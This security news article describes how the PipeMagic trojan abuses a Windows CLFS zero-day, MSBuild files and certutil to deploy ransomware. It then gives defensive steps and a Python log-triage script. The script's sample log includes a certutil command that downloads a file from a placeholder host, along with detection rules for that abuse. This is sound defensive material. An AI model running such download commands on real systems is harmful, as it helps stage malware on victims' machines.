Phishing Trojan Exploits Windows Zero-Day Bug
Phishing trojan campaigns are evolving fast. A recent report shows that a new threat called PipeMagic is abusing a Windows zero-day flaw.
The exploit targets a vulnerability in the Windows Common Log File System (CLFS). The flaw allows attackers to gain full SYSTEM privileges.
Researchers say the attackers used this flaw in real-world ransomware attacks. Victims included companies in the U.S., Venezuela, Spain, and Saudi Arabia.
Targets came from industries such as real estate, finance, software, and retail, which points to a deliberate, global strategy by the threat actor.
How the PipeMagic Trojan Works
PipeMagic is a plugin-based trojan that has existed since 2022. It is deployed through malicious MSBuild project files.
These files include encrypted payloads that unpack and launch the trojan. Once active, the malware escalates access within the infected system.
Researchers noted that the attackers used certutil, a built-in Windows command-line tool, to download the malware. They pulled the files from a previously compromised, legitimate website.
After gaining access, the attackers dumped credentials from memory and encrypted files. Then, they left behind a ransom note tied to the RansomEXX group.
Multiple Zero-Days, One Trojan
This is not the first time PipeMagic has abused zero-day flaws. It previously used another CLFS vulnerability in 2023, and the trojan also helped deploy ransomware via a kernel bug patched just last month. This pattern shows a consistent and sophisticated attack method.
According to the report, PipeMagic exploits memory corruption through the CLFS kernel driver. It uses the RtlSetAllBits API to hijack system privileges.
Once access is granted, the trojan injects into SYSTEM processes. Then it spreads ransomware and locks files with random extensions.
Good News for Windows 11 Users
The latest version of Windows 11 (24H2) is not affected. That’s because it restricts access to certain system classes.
Only admin-level users with SeDebugPrivilege can reach those classes. Therefore, regular users are not exposed to this specific attack chain.
How to Stay Protected
To defend against phishing trojans like PipeMagic, follow these steps:
- Apply all patches promptly, especially for Windows kernel vulnerabilities.
- Disable build and scripting tools such as MSBuild if they are not needed in your environment.
- Use endpoint detection with memory inspection features.
- Restrict admin privileges to essential users only.
- Monitor logs for certutil or MSBuild activity, which may signal compromise.
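The last point, monitoring for certutil and MSBuild activity, can be turned into a simple triage rule. The following is an added example, not code from the report or from this article; the pipe-separated log format, the sample records and the heuristics are constructed for illustration and would need adapting to your real process-creation telemetry.

```python
import re
from typing import Dict, List

# Constructed sample process-creation records (not taken from the report).
# One record per line: timestamp | parent image | command line
SAMPLE_LOG = r"""
2025-04-09T10:01:12Z | C:\Windows\explorer.exe | "C:\Windows\System32\certutil.exe" -urlcache -split -f http://example.invalid/upd.bin C:\Users\Public\upd.bin
2025-04-09T10:01:40Z | C:\Windows\System32\cmd.exe | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" C:\Users\Public\build.proj
2025-04-09T10:02:05Z | C:\Windows\System32\services.exe | "C:\Windows\System32\certutil.exe" -verify C:\Temp\cert.cer
2025-04-09T10:03:33Z | C:\Program Files\Microsoft Visual Studio\2022\Common7\IDE\devenv.exe | "C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe" C:\src\app\app.csproj
"""

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Directories an unprivileged user can write to; a project file here is unusual for a real build.
USER_WRITABLE_RE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.IGNORECASE)
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def parse_record(line: str) -> Dict[str, str]:
    ts, parent, cmdline = (part.strip() for part in line.split(" | ", 2))
    return {"ts": ts, "parent": parent, "cmdline": cmdline}


def classify(rec: Dict[str, str]) -> List[str]:
    """Return the reasons a record looks like the certutil/MSBuild abuse described above."""
    cmd = rec["cmdline"]
    image = cmd.split('"')[1] if cmd.startswith('"') else cmd.split(" ", 1)[0]
    args = cmd[len(image) + 2:] if cmd.startswith('"') else cmd[len(image):]
    name = image.rsplit("\\", 1)[-1].lower()
    parent_name = rec["parent"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if name == "certutil.exe":
        # certutil exists for certificate tasks; a URL or -urlcache means it is acting as a downloader
        if URL_RE.search(args) or "-urlcache" in args.lower():
            reasons.append("certutil used as downloader")
    elif name == "msbuild.exe":
        # A project file in a user-writable path, or a shell parent, is the loader pattern, not a normal build
        if USER_WRITABLE_RE.search(args):
            reasons.append("MSBuild project from user-writable path")
        if parent_name in SHELL_PARENTS:
            reasons.append("MSBuild launched from a script host or shell")
    return reasons


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one hit per suspicious record, with its timestamp and the matched reasons."""
    hits = []
    for line in text.splitlines():
        if line.strip():
            rec = parse_record(line)
            reasons = classify(rec)
            if reasons:
                hits.append({"ts": rec["ts"], "reasons": reasons})
    return hits
```

Running scan_log(SAMPLE_LOG) flags only the first two records; the certutil -verify call and the MSBuild run launched from Visual Studio against a source tree pass untouched.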
Cybercriminals rely on users overlooking security updates. Therefore, staying proactive with patches and permissions is critical to stopping these attacks.
Sleep well, we got you covered.